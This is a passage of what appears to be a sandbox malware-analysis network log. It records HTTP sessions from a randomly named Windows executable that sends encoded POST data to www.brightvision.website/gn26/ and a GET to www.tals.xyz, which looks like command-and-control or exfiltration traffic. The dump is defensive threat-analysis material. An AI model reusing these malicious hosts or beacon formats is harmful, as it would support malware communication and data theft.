                                                                              32 | 192.168.2.8 | 50009 | 13.248.169.48 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:29:46.490703106 CET | 372 | OUT | GET /k1td/?m8=urJ0WtmP0FPTTB&DzLTc=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTHyrYyRaD0W2SHbUYxhUJeAm2Jm3PlTqYYqojkKZ3lrXmQ== HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.tals.xyz
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:29:49.982904911 CET | 392 | IN | HTTP/1.1 200 OK
                                                                              content-type: text/html
                                                                              date: Sat, 11 Jan 2025 08:29:49 GMT
                                                                              content-length: 271
                                                                              connection: close
                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?m8=urJ0WtmP0FPTTB&DzLTc=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTHyrYyRaD0W2SHbUYxhUJeAm2Jm3PlTqYYqojkKZ3lrXmQ=="}</script></head></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              33 | 192.168.2.8 | 50010 | 203.161.42.73 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:29:55.027281046 CET | 655 | OUT | POST /gn26/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.brightvision.website
                                                                              Origin: http://www.brightvision.website
                                                                              Referer: http://www.brightvision.website/gn26/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 51 31 56 38 6c 4b 55 53 31 47 47 6a 68 70 4e 64 55 76 35 63 44 46 68 4c 76 4e 49 75 64 59 6a 6d 52 58 38 79 47 4d 59 6f 72 32 35 48 30 57 72 68 4a 6e 71 31 51 38 69 63 56 4c 32 75 36 4c 67 54 34 49 71 35 74 54 6a 7a 68 63 55 32 44 46 46 4d 42 61 31 56 61 4c 66 66 4c 2f 58 65 30 6d 41 55 75 6d 75 4b 74 32 50 37 52 47 34 4a 2f 45 71 77 50 44 50 30 51 70 35 67 77 4a 4b 54 51 78 75 41 4e 38 55 4a 2b 53 77 35 75 71 50 62 56 59 70 66 4d 44 46 63 6a 63 67 71 58 74 6e 4e 62 32 56 5a 50 56 48 46 57 7a 67 38 46 63 6c 39 6c 6d 6b 6e 66 6b 48 6d 34 6d 49 5a 71 65 67 3d
                                                                              Data Ascii: DzLTc=SiBzWWJ1sOT3Q1V8lKUS1GGjhpNdUv5cDFhLvNIudYjmRX8yGMYor25H0WrhJnq1Q8icVL2u6LgT4Iq5tTjzhcU2DFFMBa1VaLffL/Xe0mAUumuKt2P7RG4J/EqwPDP0Qp5gwJKTQxuAN8UJ+Sw5uqPbVYpfMDFcjcgqXtnNb2VZPVHFWzg8Fcl9lmknfkHm4mIZqeg=
                                                                              Jan 11, 2025 09:29:55.602107048 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:29:55 GMT
                                                                              Server: Apache
                                                                              Content-Length: 16052
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                              Jan 11, 2025 09:29:55.602121115 CET224INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                              Jan 11, 2025 09:29:55.602139950 CET1236INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69
                                                                              Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
                                                                              Jan 11, 2025 09:29:55.602150917 CET1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                                                                              Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
                                                                              Jan 11, 2025 09:29:55.602180958 CET1236INData Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37
                                                                              Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
                                                                              Jan 11, 2025 09:29:55.602194071 CET672INData Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a
                                                                              Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
                                                                              Jan 11, 2025 09:29:55.602205992 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                              Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                              Jan 11, 2025 09:29:55.602217913 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                              Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                              Jan 11, 2025 09:29:55.602229118 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                              Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                              Jan 11, 2025 09:29:55.602289915 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                              Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                              Jan 11, 2025 09:29:55.607183933 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                              Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              34          192.168.2.8  50011        203.161.42.73   80                3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 11, 2025 09:29:57.582504034 CET  675                OUT        POST /gn26/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.brightvision.website
                                                                              Origin: http://www.brightvision.website
                                                                              Referer: http://www.brightvision.website/gn26/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 52 55 6c 38 6a 72 55 53 39 47 47 67 39 35 4e 64 43 66 35 59 44 46 39 4c 76 49 70 70 64 71 33 6d 52 79 41 79 48 4e 59 6f 6f 32 35 48 37 32 72 6b 4e 6e 71 75 51 38 76 6a 56 4b 4b 75 36 50 77 54 34 4a 61 35 73 67 37 77 69 73 55 77 4d 6c 46 30 46 61 31 56 61 4c 66 66 4c 35 36 7a 30 6e 6f 55 75 57 2b 4b 73 58 4f 4a 59 6d 34 4b 34 45 71 77 4c 44 4f 39 51 70 34 46 77 49 57 71 51 33 71 41 4e 34 45 4a 2b 6a 77 36 68 71 4f 51 52 59 6f 49 4c 41 68 58 6b 4e 59 75 57 50 37 69 45 6b 6c 48 44 44 32 76 4d 52 6f 36 47 63 4e 57 6c 6c 4d 52 61 54 61 4f 69 46 59 70 30 4a 32 34 68 69 76 4b 32 78 36 71 53 70 34 6d 72 33 47 6a 6e 4f 58 58
                                                                              Data Ascii: DzLTc=SiBzWWJ1sOT3RUl8jrUS9GGg95NdCf5YDF9LvIppdq3mRyAyHNYoo25H72rkNnquQ8vjVKKu6PwT4Ja5sg7wisUwMlF0Fa1VaLffL56z0noUuW+KsXOJYm4K4EqwLDO9Qp4FwIWqQ3qAN4EJ+jw6hqOQRYoILAhXkNYuWP7iEklHDD2vMRo6GcNWllMRaTaOiFYp0J24hivK2x6qSp4mr3GjnOXX
                                                                              Jan 11, 2025 09:29:58.153548956 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:29:58 GMT
                                                                              Server: Apache
                                                                              Content-Length: 16052
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                              Jan 11, 2025 09:29:58.153764963 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                              Jan 11, 2025 09:29:58.153776884 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                              Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                              Jan 11, 2025 09:29:58.153789043 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                              Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                              Jan 11, 2025 09:29:58.153800964 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                              Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                              Jan 11, 2025 09:29:58.153825998 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                              Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                              Jan 11, 2025 09:29:58.153837919 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                              Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                              Jan 11, 2025 09:29:58.153850079 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                              Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                              Jan 11, 2025 09:29:58.153861046 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                              Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                              Jan 11, 2025 09:29:58.153872013 CET224INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                              Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                                                                              Jan 11, 2025 09:29:58.158688068 CET1236INData Raw: 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterl


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              35          192.168.2.8  50012        203.161.42.73   80                3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 11, 2025 09:30:00.136533976 CET  1692               OUT        POST /gn26/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.brightvision.website
                                                                              Origin: http://www.brightvision.website
                                                                              Referer: http://www.brightvision.website/gn26/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 52 55 6c 38 6a 72 55 53 39 47 47 67 39 35 4e 64 43 66 35 59 44 46 39 4c 76 49 70 70 64 71 50 6d 51 41 34 79 47 75 67 6f 70 32 35 48 79 57 72 6c 4e 6e 72 73 51 34 4c 6e 56 4b 47 2b 36 4e 34 54 34 72 43 35 34 42 37 77 35 63 55 77 4a 56 46 50 42 61 31 36 61 4c 50 62 4c 35 4b 7a 30 6e 6f 55 75 54 36 4b 38 32 4f 4a 55 47 34 4a 2f 45 71 30 50 44 4f 52 51 6f 63 7a 77 49 53 6c 51 6e 4b 41 4e 5a 6f 4a 38 78 49 36 73 71 4f 53 57 59 6f 41 4c 41 63 50 6b 4e 30 49 57 4f 50 49 45 6e 31 48 41 47 48 48 55 6c 6b 6b 54 4f 56 6d 39 79 45 52 61 67 36 38 6b 54 55 35 31 76 7a 65 74 46 50 71 77 7a 36 69 61 6f 41 71 33 51 57 57 31 37 44 66 37 65 52 30 36 56 6a 31 77 35 4f 58 38 4b 63 49 6b 62 64 49 69 39 2b 48 4d 6c 69 62 4f 44 46 54 2f 53 69 49 71 36 61 71 4d 55 51 42 68 79 42 35 6f 4a 4a 61 54 61 5a 61 66 4e 63 59 68 75 33 44 54 62 39 78 38 66 32 6a 79 49 61 2f 69 78 46 31 4c 4b 54 51 63 35 4c 36 6e 70 32 65 64 57 55 35 66 30 46 43 2b 44 76 58 69 68 77 43 6d 48 4c 4d [TRUNCATED]
                                                                              Data Ascii: DzLTc= [TRUNCATED]
                                                                              Jan 11, 2025 09:30:00.703860998 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:30:00 GMT
                                                                              Server: Apache
                                                                              Content-Length: 16052
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                              Jan 11, 2025 09:30:00.703902006 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
